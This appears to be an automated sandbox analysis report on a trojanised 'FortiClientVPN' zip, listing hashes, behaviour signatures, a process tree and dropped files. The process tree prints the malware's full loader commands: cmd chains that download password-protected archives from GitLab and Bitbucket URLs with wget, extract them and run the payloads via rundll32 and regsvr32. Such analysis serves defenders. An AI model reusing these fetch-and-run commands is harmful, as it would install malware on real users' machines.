Analysis

  • max time kernel
    167s
  • max time network
    134s
  • platform
    windows7_x64
  • resource
    win7-20221111-en
  • resource tags
    arch:x64, arch:x86, image:win7-20221111-en, locale:en-us, os:windows7-x64, system
  • submitted
    16/12/2022, 16:07

General

  • Target: FortiClientVPN-10_11.zip
  • Size: 115.0MB
  • MD5: fee389057573b6496b3c2bdcd69102be
  • SHA1: a344e37e1045c780cad9681818056820980cd716
  • SHA256: 8e1226ecf81fb863a95dfea31603172473ed8a5d301f185927732e4ae0066814
  • SHA512: a44afb6140e1d084616b54f40d21142d8b4f2fb82dedc9ab1e4a2a0fc18f18c1a05a167806b7a66a50c958d71cd207efd6551ce73535b07867ad927103b198be
  • SSDEEP: 3145728:TNAOLDyOLNXhcrZOLmKiOL7OLUOLDOLjOLdOLW:TNfvir/KC

Score
8/10

Signatures

  • Executes dropped EXE (4 IoCs)
  • Loads dropped DLL (3 IoCs)
  • Legitimate hosting services abused for malware hosting/C2 (1 TTP)
  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Delays execution with timeout.exe (4 IoCs)
  • Suspicious behavior: EnumeratesProcesses (1 IoC)
  • Suspicious use of AdjustPrivilegeToken (5 IoCs)
  • Suspicious use of WriteProcessMemory (59 IoCs)

Processes

  • C:\Windows\Explorer.exe
    C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\FortiClientVPN-10_11.zip
    1⤵
      PID:1380
    • C:\Windows\explorer.exe
      "C:\Windows\explorer.exe"
      1⤵
        PID:1224
      • C:\Windows\system32\AUDIODG.EXE
        C:\Windows\system32\AUDIODG.EXE 0x54c
        1⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:580
      • C:\Program Files\7-Zip\7zFM.exe
        "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\FortiClientVPN-10_11.zip"
        1⤵
          PID:1652
          • C:\Users\Admin\AppData\Local\Temp\7zO476A1A0D\FortiClientVPN.exe
            "C:\Users\Admin\AppData\Local\Temp\7zO476A1A0D\FortiClientVPN.exe"
            2⤵
              PID:1176
          • C:\Users\Admin\Desktop\FortiClientVPN.exe
            "C:\Users\Admin\Desktop\FortiClientVPN.exe"
            1⤵
            • Loads dropped DLL
            • Suspicious use of WriteProcessMemory
            PID:1116
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /K >nul timeout /t 300 /nobreak & start /wait /min C:\Users\Admin\AppData\Roaming\DirectX\wget.exe -q --no-check-certificate "https://gitlab.com/michal63roberts63/soft/-/raw/main/DirectXbin.rar" -P C:\Users\Admin\AppData\Roaming\DirectX & >nul timeout /t 8 /nobreak & start /wait /min C:\Users\Admin\AppData\Roaming\DirectX\7z.exe x -y C:\Users\Admin\AppData\Roaming\DirectX\DirectXbin.rar -p2022 -oC:\Users\Admin\AppData\Roaming\DirectX & >nul timeout /t 5 /nobreak & start /wait /min C:\Users\Admin\AppData\Roaming\DirectX\7z.exe x -y C:\Users\Admin\AppData\Roaming\DirectX\DirectX32.rar -p2022 -oC:\Users\Admin\AppData\Roaming\DirectX & >nul timeout /t 5 /nobreak & start /min C:\Users\Admin\AppData\Roaming\DirectX\DirectX32.exe & >nul timeout /t 5 /nobreak & start /wait /min C:\Users\Admin\AppData\Roaming\DirectX\7z.exe x -y C:\Users\Admin\AppData\Roaming\DirectX\DirectX64.rar -p2022 -oC:\Users\Admin\AppData\Roaming\DirectX & >nul timeout /t 10 /nobreak & start /min rundll32 C:\Users\Admin\AppData\Roaming\DirectX\DirectX.dll DirectX & EXIT
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:1924
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 300 /nobreak
                3⤵
                • Delays execution with timeout.exe
                PID:1980
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /K >nul timeout /t 90 /nobreak & start .\data\AppInfo\setup.exe & EXIT
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:1712
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 90 /nobreak
                3⤵
                • Delays execution with timeout.exe
                PID:1056
              • C:\Users\Admin\Desktop\data\AppInfo\setup.exe
                .\data\AppInfo\setup.exe
                3⤵
                  PID:324
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" get-childitem C:\Users\Admin\AppData\Roaming\DirectX | unblock-file
                2⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:544
              • C:\Users\Admin\AppData\Roaming\DirectX\wget.exe
                "C:\Users\Admin\AppData\Roaming\DirectX\wget.exe" ping https://bitbucket.org/soft-here/soft/downloads/DirectXbin.rar -P C:\Users\Admin\AppData\Roaming
                2⤵
                • Executes dropped EXE
                PID:1888
              • C:\Users\Admin\AppData\Roaming\DirectX\winrar.exe
                "C:\Users\Admin\AppData\Roaming\DirectX\winrar.exe" x -y -p2022 C:\Users\Admin\AppData\Roaming\DirectXbin.rar C:\Users\Admin\AppData\Roaming
                2⤵
                • Executes dropped EXE
                PID:1568
              • C:\Users\Admin\AppData\Roaming\DirectX\winrar.exe
                "C:\Users\Admin\AppData\Roaming\DirectX\winrar.exe" x -y -p2022 C:\Users\Admin\AppData\Roaming\DirectX.rar C:\Users\Admin\AppData\Roaming
                2⤵
                • Executes dropped EXE
                PID:1228
              • C:\Users\Admin\AppData\Roaming\DirectX\winrar.exe
                "C:\Users\Admin\AppData\Roaming\DirectX\winrar.exe" x -y -p2022 C:\Users\Admin\AppData\Roaming\DirectX64.rar C:\Users\Admin\AppData\Roaming
                2⤵
                • Executes dropped EXE
                PID:1504
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /K >nul timeout /t 7 /nobreak & regsvr32 /s C:\Users\Admin\AppData\Roaming\DirectX.dll & >nul timeout /t 5 /nobreak & EXIT
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:620
                • C:\Windows\SysWOW64\timeout.exe
                  timeout /t 7 /nobreak
                  3⤵
                  • Delays execution with timeout.exe
                  PID:1072
                • C:\Windows\SysWOW64\regsvr32.exe
                  regsvr32 /s C:\Users\Admin\AppData\Roaming\DirectX.dll
                  3⤵
                    PID:1580
                  • C:\Windows\SysWOW64\timeout.exe
                    timeout /t 5 /nobreak
                    3⤵
                    • Delays execution with timeout.exe
                    PID:108

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\Roaming\DirectX\WinRAR.exe
    Filesize: 2.1MB
    MD5: f59f4f7bea12dd7c8d44f0a717c21c8e
    SHA1: 17629ccb3bd555b72a4432876145707613100b3e
    SHA256: f150b01c1cbc540c880dc00d812bcca1a8abe1166233227d621408f3e75b57d4
    SHA512: 44811f9a5f2917ccd56a7f894157fa305b749ca04903eeaeca493864742e459e0ce640c01c804c266283ce8c3e147c8e6b6cfd6c5cb717e2a374e92c32a63b2c

  • C:\Users\Admin\AppData\Roaming\DirectX\wget.exe
    Filesize: 4.9MB
    MD5: 8c04808e4ba12cb793cf661fbbf6c2a0
    SHA1: bdfdb50c5f251628c332042f85e8dd8cf5f650e3
    SHA256: a7b656fb7a45f8980784b90b40f4a14d035b9dc15616465a341043736ec53272
    SHA512: 9619f96c3180ef3d738ecc1f5df7508c3ff8904021065665c8388a484648e135105e1c1585de1577c8b158f9b5bc241e3ff7f92665e9553e846e1b750ddea20f

  • C:\Users\Admin\AppData\Roaming\WinRAR\version.dat
    Filesize: 12B
    MD5: 6ae6991da8cd865bad3784053ab9319c
    SHA1: d38f9c2552d929684c6c8ab85f3b0db95157ee13
    SHA256: c34d82a75118f5b5c9719df9b8a9ce7d83b945c60ee0157b650e504e17d664bf
    SHA512: 23c8a32767c27693dc7417d5292fb09235c7c65bafda672c017c75a47fafcbaad1ffe5ff1bfc22e8d05c5bb40477ede1a07849e20a296931e5a2cff379903f16

  • \Users\Admin\AppData\Roaming\DirectX\WinRAR.exe
    Filesize: 2.1MB
    MD5: f59f4f7bea12dd7c8d44f0a717c21c8e
    SHA1: 17629ccb3bd555b72a4432876145707613100b3e
    SHA256: f150b01c1cbc540c880dc00d812bcca1a8abe1166233227d621408f3e75b57d4
    SHA512: 44811f9a5f2917ccd56a7f894157fa305b749ca04903eeaeca493864742e459e0ce640c01c804c266283ce8c3e147c8e6b6cfd6c5cb717e2a374e92c32a63b2c

  • \Users\Admin\AppData\Roaming\DirectX\wget.exe
    Filesize: 4.9MB
    MD5: 8c04808e4ba12cb793cf661fbbf6c2a0
    SHA1: bdfdb50c5f251628c332042f85e8dd8cf5f650e3
    SHA256: a7b656fb7a45f8980784b90b40f4a14d035b9dc15616465a341043736ec53272
    SHA512: 9619f96c3180ef3d738ecc1f5df7508c3ff8904021065665c8388a484648e135105e1c1585de1577c8b158f9b5bc241e3ff7f92665e9553e846e1b750ddea20f

  • memory/544-63-0x0000000073160000-0x000000007370B000-memory.dmp
    Filesize: 5.7MB

  • memory/544-64-0x0000000073160000-0x000000007370B000-memory.dmp
    Filesize: 5.7MB

  • memory/1176-55-0x0000000075E81000-0x0000000075E83000-memory.dmp
    Filesize: 8KB

  • memory/1224-54-0x000007FEFB9A1000-0x000007FEFB9A3000-memory.dmp
    Filesize: 8KB